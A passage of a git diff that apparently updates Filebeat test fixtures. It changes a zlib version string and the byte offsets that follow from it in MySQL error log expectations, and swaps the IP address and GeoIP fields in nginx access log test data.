-161209 14:37:57 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:37:57 InnoDB: Compressed tables use zlib 1.128.3.4
 161209 14:37:57 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:37:57 InnoDB: Completed initialization of buffer pool
 161209 14:37:57 InnoDB: highest supported file format is Barracuda.
diff --git a/filebeat/module/mysql/error/test/mysql-ubuntu-5.5.53.log-expected.json b/filebeat/module/mysql/error/test/mysql-ubuntu-5.5.53.log-expected.json
index c9c94ad66b0a..7bff59c06c32 100644
--- a/filebeat/module/mysql/error/test/mysql-ubuntu-5.5.53.log-expected.json
+++ b/filebeat/module/mysql/error/test/mysql-ubuntu-5.5.53.log-expected.json
@@ -88,7 +88,7 @@
 "fileset.name": "error",
 "input.type": "log",
 "log.offset": 374,
- "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+ "message": "InnoDB: Compressed tables use zlib 1.128.3.4",
 "service.type": "mysql"
 },
 {
@@ -105,7 +105,7 @@
 ],
 "fileset.name": "error",
 "input.type": "log",
- "log.offset": 433,
+ "log.offset": 435,
 "message": "InnoDB: Initializing buffer pool, size = 128.0M",
 "service.type": "mysql"
 },
@@ -126,7 +126,7 @@ "log.flags": [ "multiline" ], - "log.offset": 497, + "log.offset": 499, "message": "InnoDB: Completed initialization of buffer pool\nInnoDB: The first specified data file ./ibdata1 did not exist:\nInnoDB: a new database to be created!", "service.type": "mysql" }, @@ -147,7 +147,7 @@ "log.flags": [ "multiline" ], - "log.offset": 662, + "log.offset": 664, "message": "InnoDB: Setting file ./ibdata1 size to 10 MB\nInnoDB: Database physically writes the file full: wait...", "service.type": "mysql" }, @@ -168,7 +168,7 @@ "log.flags": [ "multiline" ], - "log.offset": 782, + "log.offset": 784, "message": "InnoDB: Log file ./ib_logfile0 did not exist: new to be created\nInnoDB: Setting log file ./ib_logfile0 size to 5 MB\nInnoDB: Database physically writes the file full: wait...", "service.type": "mysql" }, @@ -189,7 +189,7 @@ "log.flags": [ "multiline" ], - "log.offset": 973, + "log.offset": 975, "message": "InnoDB: Log file ./ib_logfile1 did not exist: new to be created\nInnoDB: Setting log file ./ib_logfile1 size to 5 MB\nInnoDB: Database physically writes the file full: wait...\nInnoDB: Doublewrite buffer not found: creating new\nInnoDB: Doublewrite buffer created\nInnoDB: 127 rollback segment(s) active.\nInnoDB: Creating foreign key constraint system tables\nInnoDB: Foreign key constraint system tables created", "service.type": "mysql" }, @@ -207,7 +207,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 1397, + "log.offset": 1399, "message": "InnoDB: Waiting for the background threads to start", "service.type": "mysql" }, @@ -225,7 +225,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 1466, + "log.offset": 1468, "message": "InnoDB: 5.5.53 started; log sequence number 0", "service.type": "mysql" }, @@ -243,7 +243,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 1528, + "log.offset": 1530, "message": "InnoDB: Starting shutdown...", "service.type": "mysql" }, 
@@ -261,7 +261,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 1574, + "log.offset": 1576, "message": "InnoDB: Shutdown completed; log sequence number 1595675", "service.type": "mysql" }, @@ -280,7 +280,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Warning", - "log.offset": 1647, + "log.offset": 1649, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "service.type": "mysql" }, @@ -299,7 +299,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 1838, + "log.offset": 1840, "message": "Plugin 'FEDERATED' is disabled.", "service.type": "mysql" }, @@ -317,7 +317,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 1893, + "log.offset": 1895, "message": "InnoDB: The InnoDB memory heap is disabled", "service.type": "mysql" }, @@ -335,7 +335,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 1952, + "log.offset": 1954, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "service.type": "mysql" }, @@ -353,8 +353,8 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 2021, - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "log.offset": 2023, + "message": "InnoDB: Compressed tables use zlib 1.128.3.4", "service.type": "mysql" }, { @@ -371,7 +371,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 2080, + "log.offset": 2084, "message": "InnoDB: Initializing buffer pool, size = 128.0M", "service.type": "mysql" }, @@ -389,7 +389,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 2144, + "log.offset": 2148, "message": "InnoDB: Completed initialization of buffer pool", "service.type": "mysql" }, 
@@ -407,7 +407,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 2208, + "log.offset": 2212, "message": "InnoDB: highest supported file format is Barracuda.", "service.type": "mysql" }, @@ -425,7 +425,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 2276, + "log.offset": 2280, "message": "InnoDB: Waiting for the background threads to start", "service.type": "mysql" }, @@ -446,7 +446,7 @@ "log.flags": [ "multiline" ], - "log.offset": 2345, + "log.offset": 2349, "message": "InnoDB: 5.5.53 started; log sequence number 1595675\nERROR: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ALTER TABLE user ADD column Show_view_priv enum('N','Y') CHARACTER SET utf8 NOT ' at line 1", "service.type": "mysql" }, @@ -469,7 +469,7 @@ "multiline" ], "log.level": "ERROR", - "log.offset": 2653, + "log.offset": 2657, "message": "Aborting\n", "service.type": "mysql" }, @@ -487,7 +487,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 2687, + "log.offset": 2691, "message": "InnoDB: Starting shutdown...", "service.type": "mysql" }, @@ -505,7 +505,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 2733, + "log.offset": 2737, "message": "InnoDB: Shutdown completed; log sequence number 1595675", "service.type": "mysql" }, @@ -527,7 +527,7 @@ "multiline" ], "log.level": "Note", - "log.offset": 2806, + "log.offset": 2810, "message": "/usr/sbin/mysqld: Shutdown complete\n", "service.type": "mysql" }, @@ -546,7 +546,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Warning", - "log.offset": 2866, + "log.offset": 2870, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "service.type": "mysql" }, 
@@ -565,7 +565,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 3057, + "log.offset": 3061, "message": "Plugin 'FEDERATED' is disabled.", "service.type": "mysql" }, @@ -583,7 +583,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 3112, + "log.offset": 3116, "message": "InnoDB: The InnoDB memory heap is disabled", "service.type": "mysql" }, @@ -601,7 +601,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 3171, + "log.offset": 3175, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "service.type": "mysql" }, @@ -619,8 +619,8 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 3240, - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "log.offset": 3244, + "message": "InnoDB: Compressed tables use zlib 1.128.3.4", "service.type": "mysql" }, { @@ -637,7 +637,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 3299, + "log.offset": 3305, "message": "InnoDB: Initializing buffer pool, size = 128.0M", "service.type": "mysql" }, @@ -655,7 +655,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 3363, + "log.offset": 3369, "message": "InnoDB: Completed initialization of buffer pool", "service.type": "mysql" }, @@ -673,7 +673,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 3427, + "log.offset": 3433, "message": "InnoDB: highest supported file format is Barracuda.", "service.type": "mysql" }, @@ -691,7 +691,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 3495, + "log.offset": 3501, "message": "InnoDB: Waiting for the background threads to start", "service.type": "mysql" }, @@ -709,7 +709,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 3564, + "log.offset": 3570, "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "service.type": "mysql" }, 
@@ -727,7 +727,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 3632, + "log.offset": 3638, "message": "InnoDB: Starting shutdown...", "service.type": "mysql" }, @@ -750,7 +750,7 @@ "multiline" ], "log.level": "ERROR", - "log.offset": 3678, + "log.offset": 3684, "message": "Aborting\n", "service.type": "mysql" }, @@ -768,7 +768,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 3712, + "log.offset": 3718, "message": "InnoDB: Starting shutdown...", "service.type": "mysql" }, @@ -786,7 +786,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 3758, + "log.offset": 3764, "message": "InnoDB: Shutdown completed; log sequence number 1595675", "service.type": "mysql" }, @@ -808,7 +808,7 @@ "multiline" ], "log.level": "Note", - "log.offset": 3831, + "log.offset": 3837, "message": "/usr/sbin/mysqld: Shutdown complete\n", "service.type": "mysql" }, @@ -827,7 +827,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Warning", - "log.offset": 3891, + "log.offset": 3897, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "service.type": "mysql" }, @@ -846,7 +846,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 4082, + "log.offset": 4088, "message": "Plugin 'FEDERATED' is disabled.", "service.type": "mysql" }, @@ -864,7 +864,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 4137, + "log.offset": 4143, "message": "InnoDB: The InnoDB memory heap is disabled", "service.type": "mysql" }, @@ -882,7 +882,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 4196, + "log.offset": 4202, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "service.type": "mysql" }, 
@@ -900,8 +900,8 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 4265, - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "log.offset": 4271, + "message": "InnoDB: Compressed tables use zlib 1.128.3.4", "service.type": "mysql" }, { @@ -918,7 +918,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 4324, + "log.offset": 4332, "message": "InnoDB: Initializing buffer pool, size = 128.0M", "service.type": "mysql" }, @@ -936,7 +936,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 4388, + "log.offset": 4396, "message": "InnoDB: Completed initialization of buffer pool", "service.type": "mysql" }, @@ -954,7 +954,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 4452, + "log.offset": 4460, "message": "InnoDB: highest supported file format is Barracuda.", "service.type": "mysql" }, @@ -972,7 +972,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 4520, + "log.offset": 4528, "message": "InnoDB: Waiting for the background threads to start", "service.type": "mysql" }, @@ -990,7 +990,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 4589, + "log.offset": 4597, "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "service.type": "mysql" }, @@ -1009,7 +1009,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 4657, + "log.offset": 4665, "message": "Server hostname (bind-address): '127.0.0.1'; port: 3306", "service.type": "mysql" }, @@ -1028,7 +1028,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 4736, + "log.offset": 4744, "message": "- '127.0.0.1' resolves to '127.0.0.1';", "service.type": "mysql" }, @@ -1047,7 +1047,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 4800, + "log.offset": 4808, "message": "Server socket created on IP: '127.0.0.1'.", "service.type": "mysql" }, 
@@ -1066,7 +1066,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 4865, + "log.offset": 4873, "message": "Event Scheduler: Loaded 0 events", "service.type": "mysql" }, @@ -1088,7 +1088,7 @@ "multiline" ], "log.level": "Note", - "log.offset": 4921, + "log.offset": 4929, "message": "/usr/sbin/mysqld: ready for connections.\nVersion: '5.5.53-0ubuntu0.12.04.1' socket: '/var/run/mysqld/mysqld.sock' port: 3306 (Ubuntu)", "service.type": "mysql" }, @@ -1110,7 +1110,7 @@ "multiline" ], "log.level": "Note", - "log.offset": 5081, + "log.offset": 5089, "message": "/usr/sbin/mysqld: Normal shutdown\n", "service.type": "mysql" }, @@ -1129,7 +1129,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 5139, + "log.offset": 5147, "message": "Event Scheduler: Purging the queue. 0 events", "service.type": "mysql" }, @@ -1147,7 +1147,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 5207, + "log.offset": 5215, "message": "InnoDB: Starting shutdown...", "service.type": "mysql" }, @@ -1165,7 +1165,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 5253, + "log.offset": 5261, "message": "InnoDB: Shutdown completed; log sequence number 1595685", "service.type": "mysql" }, @@ -1187,7 +1187,7 @@ "multiline" ], "log.level": "Note", - "log.offset": 5326, + "log.offset": 5334, "message": "/usr/sbin/mysqld: Shutdown complete\n", "service.type": "mysql" }, @@ -1206,7 +1206,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Warning", - "log.offset": 5386, + "log.offset": 5394, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "service.type": "mysql" }, 
@@ -1225,7 +1225,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 5577, + "log.offset": 5585, "message": "Plugin 'FEDERATED' is disabled.", "service.type": "mysql" }, @@ -1243,7 +1243,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 5632, + "log.offset": 5640, "message": "InnoDB: The InnoDB memory heap is disabled", "service.type": "mysql" }, @@ -1261,7 +1261,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 5691, + "log.offset": 5699, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "service.type": "mysql" }, @@ -1279,8 +1279,8 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 5760, - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "log.offset": 5768, + "message": "InnoDB: Compressed tables use zlib 1.128.3.4", "service.type": "mysql" }, { @@ -1297,7 +1297,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 5819, + "log.offset": 5829, "message": "InnoDB: Initializing buffer pool, size = 128.0M", "service.type": "mysql" }, @@ -1315,7 +1315,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 5883, + "log.offset": 5893, "message": "InnoDB: Completed initialization of buffer pool", "service.type": "mysql" }, @@ -1333,7 +1333,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 5947, + "log.offset": 5957, "message": "InnoDB: highest supported file format is Barracuda.", "service.type": "mysql" }, @@ -1351,7 +1351,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 6015, + "log.offset": 6025, "message": "InnoDB: Waiting for the background threads to start", "service.type": "mysql" }, @@ -1369,7 +1369,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 6084, + "log.offset": 6094, "message": "InnoDB: 5.5.53 started; log sequence number 1595685", "service.type": "mysql" }, 
@@ -1388,7 +1388,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 6152, + "log.offset": 6162, "message": "Server hostname (bind-address): '127.0.0.1'; port: 3306", "service.type": "mysql" }, @@ -1407,7 +1407,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 6231, + "log.offset": 6241, "message": "- '127.0.0.1' resolves to '127.0.0.1';", "service.type": "mysql" }, @@ -1426,7 +1426,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 6295, + "log.offset": 6305, "message": "Server socket created on IP: '127.0.0.1'.", "service.type": "mysql" }, @@ -1445,7 +1445,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 6360, + "log.offset": 6370, "message": "Event Scheduler: Loaded 0 events", "service.type": "mysql" }, @@ -1467,7 +1467,7 @@ "multiline" ], "log.level": "Note", - "log.offset": 6416, + "log.offset": 6426, "message": "/usr/sbin/mysqld: ready for connections.\nVersion: '5.5.53-0ubuntu0.12.04.1-log' socket: '/var/run/mysqld/mysqld.sock' port: 3306 (Ubuntu)", "service.type": "mysql" }, @@ -1486,7 +1486,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Warning", - "log.offset": 6580, + "log.offset": 6590, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "service.type": "mysql" }, @@ -1505,7 +1505,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 6771, + "log.offset": 6781, "message": "Plugin 'FEDERATED' is disabled.", "service.type": "mysql" }, @@ -1523,7 +1523,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 6826, + "log.offset": 6836, "message": "InnoDB: The InnoDB memory heap is disabled", "service.type": "mysql" }, 
@@ -1541,7 +1541,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 6885, + "log.offset": 6895, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "service.type": "mysql" }, @@ -1559,8 +1559,8 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 6954, - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "log.offset": 6964, + "message": "InnoDB: Compressed tables use zlib 1.128.3.4", "service.type": "mysql" }, { @@ -1577,7 +1577,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 7013, + "log.offset": 7025, "message": "InnoDB: Initializing buffer pool, size = 128.0M", "service.type": "mysql" }, @@ -1598,7 +1598,7 @@ "log.flags": [ "multiline" ], - "log.offset": 7077, + "log.offset": 7089, "message": "InnoDB: Completed initialization of buffer pool\nInnoDB: The first specified data file ./ibdata1 did not exist:\nInnoDB: a new database to be created!", "service.type": "mysql" }, @@ -1619,7 +1619,7 @@ "log.flags": [ "multiline" ], - "log.offset": 7242, + "log.offset": 7254, "message": "InnoDB: Setting file ./ibdata1 size to 10 MB\nInnoDB: Database physically writes the file full: wait...", "service.type": "mysql" }, @@ -1640,7 +1640,7 @@ "log.flags": [ "multiline" ], - "log.offset": 7362, + "log.offset": 7374, "message": "InnoDB: Log file ./ib_logfile0 did not exist: new to be created\nInnoDB: Setting log file ./ib_logfile0 size to 5 MB\nInnoDB: Database physically writes the file full: wait...", "service.type": "mysql" }, 
@@ -1661,7 +1661,7 @@ "log.flags": [ "multiline" ], - "log.offset": 7553, + "log.offset": 7565, "message": "InnoDB: Log file ./ib_logfile1 did not exist: new to be created\nInnoDB: Setting log file ./ib_logfile1 size to 5 MB\nInnoDB: Database physically writes the file full: wait...\nInnoDB: Doublewrite buffer not found: creating new\nInnoDB: Doublewrite buffer created\nInnoDB: 127 rollback segment(s) active.\nInnoDB: Creating foreign key constraint system tables\nInnoDB: Foreign key constraint system tables created", "service.type": "mysql" }, @@ -1679,7 +1679,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 7977, + "log.offset": 7989, "message": "InnoDB: Waiting for the background threads to start", "service.type": "mysql" }, @@ -1697,7 +1697,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 8046, + "log.offset": 8058, "message": "InnoDB: 5.5.53 started; log sequence number 0", "service.type": "mysql" }, @@ -1715,7 +1715,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 8108, + "log.offset": 8120, "message": "InnoDB: Starting shutdown...", "service.type": "mysql" }, @@ -1733,7 +1733,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 8154, + "log.offset": 8166, "message": "InnoDB: Shutdown completed; log sequence number 1595675", "service.type": "mysql" }, @@ -1752,7 +1752,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Warning", - "log.offset": 8227, + "log.offset": 8239, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "service.type": "mysql" }, @@ -1771,7 +1771,7 @@ "fileset.name": "error", "input.type": "log", "log.level": "Note", - "log.offset": 8418, + "log.offset": 8430, "message": "Plugin 'FEDERATED' is disabled.", "service.type": "mysql" }, 
@@ -1789,7 +1789,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 8473, + "log.offset": 8485, "message": "InnoDB: The InnoDB memory heap is disabled", "service.type": "mysql" }, @@ -1807,7 +1807,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 8532, + "log.offset": 8544, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "service.type": "mysql" }, @@ -1825,8 +1825,8 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 8601, - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "log.offset": 8613, + "message": "InnoDB: Compressed tables use zlib 1.128.3.4", "service.type": "mysql" }, { @@ -1843,7 +1843,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 8660, + "log.offset": 8674, "message": "InnoDB: Initializing buffer pool, size = 128.0M", "service.type": "mysql" }, @@ -1861,7 +1861,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 8724, + "log.offset": 8738, "message": "InnoDB: Completed initialization of buffer pool", "service.type": "mysql" }, @@ -1879,7 +1879,7 @@ ], "fileset.name": "error", "input.type": "log", - "log.offset": 8788, + "log.offset": 8802, "message": "InnoDB: highest supported file format is Barracuda.", "service.type": "mysql" } diff --git a/filebeat/module/nginx/access/test/access.log b/filebeat/module/nginx/access/test/access.log index 7acb1428af89..42ec0189320e 100644 --- a/filebeat/module/nginx/access/test/access.log +++ b/filebeat/module/nginx/access/test/access.log 
@@ -1,11 +1,11 @@ -77.179.66.156 - - [25/Oct/2016:14:49:33 +0200] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36" -77.179.66.156 - - [25/Oct/2016:14:49:34 +0200] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36" -77.179.66.156 - - [25/Oct/2016:14:50:44 +0200] "GET /adsasd HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36" -77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" -77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" -77.179.66.156 - - [07/Dec/2016:10:43:18 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" -77.179.66.156 - - [07/Dec/2016:10:43:21 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" -77.179.66.156 - - [07/Dec/2016:10:43:23 +0100] "GET /test1 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" +89.160.20.156 - - [25/Oct/2016:14:49:33 +0200] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36" +89.160.20.156 - - [25/Oct/2016:14:49:34 +0200] "GET /favicon.ico HTTP/1.1" 404 571 
"http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36" +89.160.20.156 - - [25/Oct/2016:14:50:44 +0200] "GET /adsasd HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36" +89.160.20.156 - - [07/Dec/2016:10:34:43 +0100] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" +89.160.20.156 - - [07/Dec/2016:10:34:43 +0100] "GET /favicon.ico HTTP/1.1" 404 571 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" +89.160.20.156 - - [07/Dec/2016:10:43:18 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" +89.160.20.156 - - [07/Dec/2016:10:43:21 +0100] "GET /test HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" +89.160.20.156 - - [07/Dec/2016:10:43:23 +0100] "GET /test1 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" 127.0.0.1 - - [07/Dec/2016:11:04:37 +0100] "GET /test1 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" 127.0.0.1 - - [07/Dec/2016:11:04:58 +0100] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" 127.0.0.1 - - [07/Dec/2016:11:04:59 +0100] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" 
diff --git a/filebeat/module/nginx/access/test/access.log-expected.json b/filebeat/module/nginx/access/test/access.log-expected.json
index 6a0af6f499c7..b440144a3655 100644
--- a/filebeat/module/nginx/access/test/access.log-expected.json
+++ b/filebeat/module/nginx/access/test/access.log-expected.json
@@ -7,7 +7,7 @@
 "event.dataset": "nginx.access",
 "event.kind": "event",
 "event.module": "nginx",
- "event.original": "77.179.66.156 - - [25/Oct/2016:14:49:33 +0200] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"",
+ "event.original": "89.160.20.156 - - [25/Oct/2016:14:49:33 +0200] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"",
 "event.outcome": "success",
 "event.timezone": "-02:00",
 "event.type": [
@@ -21,24 +21,24 @@
 "input.type": "log",
 "log.offset": 0,
 "nginx.access.remote_ip_list": [
- "77.179.66.156"
+ "89.160.20.156"
 ],
 "related.ip": [
- "77.179.66.156"
+ "89.160.20.156"
 ],
 "service.type": "nginx",
- "source.address": "77.179.66.156",
- "source.as.number": 6805,
- "source.as.organization.name": "Telefonica Germany",
- "source.geo.city_name": "Germersheim",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 49.2231,
- "source.geo.location.lon": 8.3639,
- "source.geo.region_iso_code": "DE-RP",
- "source.geo.region_name": "Rheinland-Pfalz",
- "source.ip": "77.179.66.156",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "url.original": "/",
 "url.path": "/",
 "user_agent.device.name": "Mac",
@@ -57,7 +57,7 @@
 "event.dataset": "nginx.access",
 "event.kind": "event",
 "event.module": "nginx",
- "event.original": "77.179.66.156 - - [25/Oct/2016:14:49:34 +0200] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36\"",
